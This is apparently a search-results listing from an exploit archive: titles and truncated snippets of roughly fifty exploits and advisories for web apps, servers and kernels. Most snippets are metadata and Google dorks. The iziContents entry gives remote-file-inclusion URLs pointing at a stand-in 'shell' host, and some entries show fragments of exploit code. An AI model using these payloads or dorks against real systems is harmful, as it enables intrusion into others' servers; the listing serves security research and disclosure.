41207 matches found
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities Advisory ID: HTB23165 Product: BigTree CMS Vendor: BigTree CMS Vulnerable Versions: 4.0 RC2 and probably prior Tested Version: 4.0 RC2 Vendor Notification: July 17, 2013 Vendor Patch: July 17, 2013 Public Disclosure: August 7, 2013 Vulnerability Type...
RealVNC 4.1.04.1.1 - Authentication Bypass
RealVNC 4.1.04.1.1 - Authentication Bypass Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit Date: 2012-05-13 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1.0 and 4.1.1 Tested on: Windows XP CVE: CVE-2006-2369 Requires vncviewer installed Basic port of hdmoore/msf2...
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035MS11-070)
Microsoft WINS - ECommEndDlg Input Validation Error MS11-035MS11-070 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MS WINS ECommEndDlg Input Validation Error 1. Advisory Information Title: MS WINS ECommEndDlg Input Validation Error Advisory ID: CORE-2011-0526 Advisory URL:...
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow Metasploit Title : BisonFTP Server Remote Buffer Overflow Exploit Author : Veerendra G.G SecPod Technologies www.secpod.com Advisory : http://secpod.org/blog/?p=384 http://secpod.org/msf/bisonserverbof.rb Version : BisonFTP Server 'BisonFTP...
Adobe Photoshop CS5 - .gif Remote Code Execution
Adobe Photoshop CS5 - .gif Remote Code Execution Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 12.0 and 12.1 Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 PRL: 2011-08 Author: Francis Provencher...
Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)
Apple Safari 5.0.5 - SVG Remote Code Execution DEP Bypass Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore : there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to...
vTiger CRM 5.0.4 - Local File Inclusion
vTiger CRM 5.0.4 - Local File Inclusion !/usr/bin/python INFORMATION: Exploit Title: Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit Google Dork: "The honest Open Source CRM" "vtiger CRM 5.0.4" Date: 5/3/2011 CVE: CVE-2009-3249 Windows link: http://bit.ly/fiOYCL Linux link:...
Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities
Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways D3G-CCR https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcas...
ClanSphere 2010 - Multiple Vulnerabilities
ClanSphere 2010 - Multiple Vulnerabilities Exploit Title: Clansphere Multiple vulnerabilities Date: 24/08/2010 Author: Sweet Contact : [email protected] Software Link: Download:http: http://sourceforge.net/projects/clansphere/ Version: all Tested on: WinXp sp3 Risk : HIGHT...
Member ID The Fish Index PHP - SQL Injection
Member ID The Fish Index PHP - SQL Injection , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | ---' ---| ---' ---' ---' ---' ------ ---' V Member ID The Fish Index PHP SQL Injection Vulnerability --== Author ==-- + Author : v4lc0m87 + Contact :...
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Apache OFBiz 1. Advisory Information Title: Multiple XSS in Apache OFBiz Advisory ID: BONSAI-2010-0103 Advisory URL:...
NX Web CMS (NX WCMS 4.5) - Multiple Vulnerabilities
NX Web CMS NX WCMS 4.5 - Multiple Vulnerabilities N/X - Web CMS N/X WCMS 4.5 Multiple Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /'...
Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)
Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC C:\perl\bin Exploit Title: Portable AVS DVD Authoring Date: 2010/4pr/05 Author: R3d-D3v!L Version: v1.3.3.51 Tested on: windows XP sp3 Coded by x$file"; print $FILE "$boom"; close$FILE; print "Done..!\n";...
Azadi Network - page SQL Injection
Azadi Network - page SQL Injection | | | Azadi Network page Remote SQL Injection Vulnerability | |-------------------- Hussin X ------------------- | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email : darkangelg85atYahooDoTcom | | | | script : www.azadinet.net | | DorK : "Powered By Azadi...
IBM SolidDB - Invalid Error Code
IBM SolidDB - Invalid Error Code 1. Advisory Information Title: IBM SolidDB invalid error code vulnerability Advisory Id: CORE-2009-1027 Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos Date published: 2009-11-18 Date of last update: 2009-11-18 Vendors contacted: IBM...
Linux Kernel 2.6.19 (Debian 4) - udp_sendmsg Local Privilege Escalation (3)
Linux Kernel 2.6.19 Debian 4 - udpsendmsg Local Privilege Escalation 3 / hoagieudpsendmsg.c LOCAL LINUX KERNEL ROOT EXPLOIT include include include include include include include include / this code will be called from NFHOOK via output callback in kernel mode / void setcurrenttaskuidsgidstozero...
Real Helix DNA - RTSP SETUP Request Handler
Real Helix DNA - RTSP SETUP Request Handler -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Real Helix DNA RTSP and SETUP request handler vulnerabilities 1. Advisory Information Title: Real Helix DNA RTSP and SETUP...
Amaya Web Editor 11.0 - XML HTML Parser
Amaya Web Editor 11.0 - XML HTML Parser -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser...
MKPortal 1.2.1 - Multiple Vulnerabilities
MKPortal 1.2.1 - Multiple Vulnerabilities waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web:...
Roundcube Webmail 0.2-3 Beta - Code Execution
Roundcube Webmail 0.2-3 Beta - Code Execution Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno Sofistic CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses...
Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow
Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Anzio Web Print Object Buffer Overflow Advisory Information Title: Anzio Web Print Object Buffer Overflow...
OpenBSD 4.0 - vga Local Privilege Escalation
OpenBSD 4.0 - vga Local Privilege Escalation / A PRODUCTION OF LUL-DISLCOSURE INC. PROUDLY PRESENTS... 888 888 888 888 888 888 .d88b. 88888b. .d88b. 88888b. 88888b. .d8888b .d88888 d88""88b 888 "88b d8P Y8b 888 "88b 888 "88b 88K d88" 888 888 888 888 888 88888888 888 888 888 888 "Y8888b. 888 888...
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure / source: https://www.securityfocus.com/bid/25774/info / The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitati...
iziContents rc6 - LocalRemote File Inclusion
iziContents rc6 - LocalRemote File Inclusion o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...
FlashGameScript 1.7 - user SQL Injection
FlashGameScript 1.7 - user SQL Injection FlashGameScript = 1.7 member.php$user SQL-Injection Exploit Vulnrability Discovered By: Xenduer77 ---July 7th, 2007 $user Is passed straight to the query without being filtered. SQL-INJECTION: For Version 1.7: -------...
PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion
PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise...
Madwifi 0.9.2.1 - WPARSN IE Remote Kernel Buffer Overflow
Madwifi 0.9.2.1 - WPARSN IE Remote Kernel Buffer Overflow / ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ expoit code by: sgrakkyu antifork.org -- 10/1/2007 CVE: 2006-6332 Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES for wpa .... memcpybuf, se-sewpaie, se-sewpaie1 + 2...
Apache 1.3.341.3.33 (Ubuntu Debian) - CGI TTY Privilege Escalation
Apache 1.3.341.3.33 Ubuntu Debian - CGI TTY Privilege Escalation / :: Kristian Hermansen :: Date: 20070229 Description: Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution...
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion By Cr@zyKing [email protected] Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & CrackersChild & Liz0zim Script : nabopoll 1.x Risk : Remote File .nclude | High Site : http://nabocorp.com/ Google Dork : inurl:"nabopoll/" Exploit :...
phpBB++ Build 100 - phpbb_root_path Remote File Inclusion
phpBB++ Build 100 - phpbbrootpath Remote File Inclusion C xoron Name: phpBB++ phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t,...
MGB 0.5.4.5 - email.php?id SQL Injection
MGB 0.5.4.5 - email.php?id SQL Injection !/usr/bin/perl MGB Google dork: intext:mgb.0.5.. & intext:mopzz | intext:mgb.0.5.4.. use IO::Socket::INET; usage unless @ARGV == 2; $host = $ARGV0; $dir = $ARGV1; $dir = "/$dir" if $dir ! /^//; $dir = "$dir/" if $dir ! //$/; $host = s/http:////g; $path...
PHPWind 5.0.1 - AdminUser Blind SQL Injection
PHPWind 5.0.1 - AdminUser Blind SQL Injection...
Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions
Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/18914/info phpBB for Mambo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker ca...
phpBB 2.0.20 - AdminRestore DBdefault_lang Remote Command Execution
phpBB 2.0.20 - AdminRestore DBdefaultlang Remote Command Execution !/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid...
Limbo CMS 1.0.4.2 - catid SQL Injection
Limbo CMS 1.0.4.2 - catid SQL Injection i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" /",$f && pregmatch"/login/",$f echo...
Mall23 - AddItem.asp SQL Injection
Mall23 - AddItem.asp SQL Injection source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities
Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities // source: https://www.securityfocus.com/bid/10672/info Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a...
Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion
Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because t...
PHPSysInfo 2.02.1 - index.php LNG File Disclosure
PHPSysInfo 2.02.1 - index.php LNG File Disclosure source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious langua...
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection Discovery by: Olga Villagran Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
Joplin Desktop 1.0.184 - Cross-Site Scripting
Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched...
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831nh1.html CVE: N/A SecuSTATION IPCAM-130 HD Came...
School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
School ERP System 1.0 - Cross Site Request Forgery Add Admin Title: School ERP System 1.0 - Cross Site Request Forgery Add Admin Date: 2020-01-31 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ Software Link:...
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enabledisable alarm)
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enabledisable alarm Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enable/disable alarm Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web...
Visual Studio 2008 - XML External Entity Injection
Visual Studio 2008 - XML External Entity Injection Exploit Title: Visual Studio 2008 - XML External Entity Injection Discovery by: hyp3rlinx Date: 2019-12-02 Vendor Homepage: www.microsoft.com Software Link: Visual Studio 2008 Express IDE Tested Version: 2008 CVE: N/A + Credits: John Page aka...
Microsoft Windows Server 2012 - Group Policy Security Feature Bypass
Microsoft Windows Server 2012 - Group Policy Security Feature Bypass Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass Date: 2019-10-28 Exploit Author: Thomas Zuk Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R...
Moxa EDR-810 - Command Injection Information Disclosure
Moxa EDR-810 - Command Injection Information Disclosure During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And th...
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - OS Command Injection !/usr/bin/python -------------------------------------------------------------------- Exploit Title: Enigma NMS OS Command Injection NETSAS Pty Ltd Enigma NMS Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor...
phpMyAdmin 4.8 - Cross-Site Request Forgery
phpMyAdmin 4.8 - Cross-Site Request Forgery Exploit Title: Cross Site Request Forgery CSRF Date: 11 June 2019 Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image ...
Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...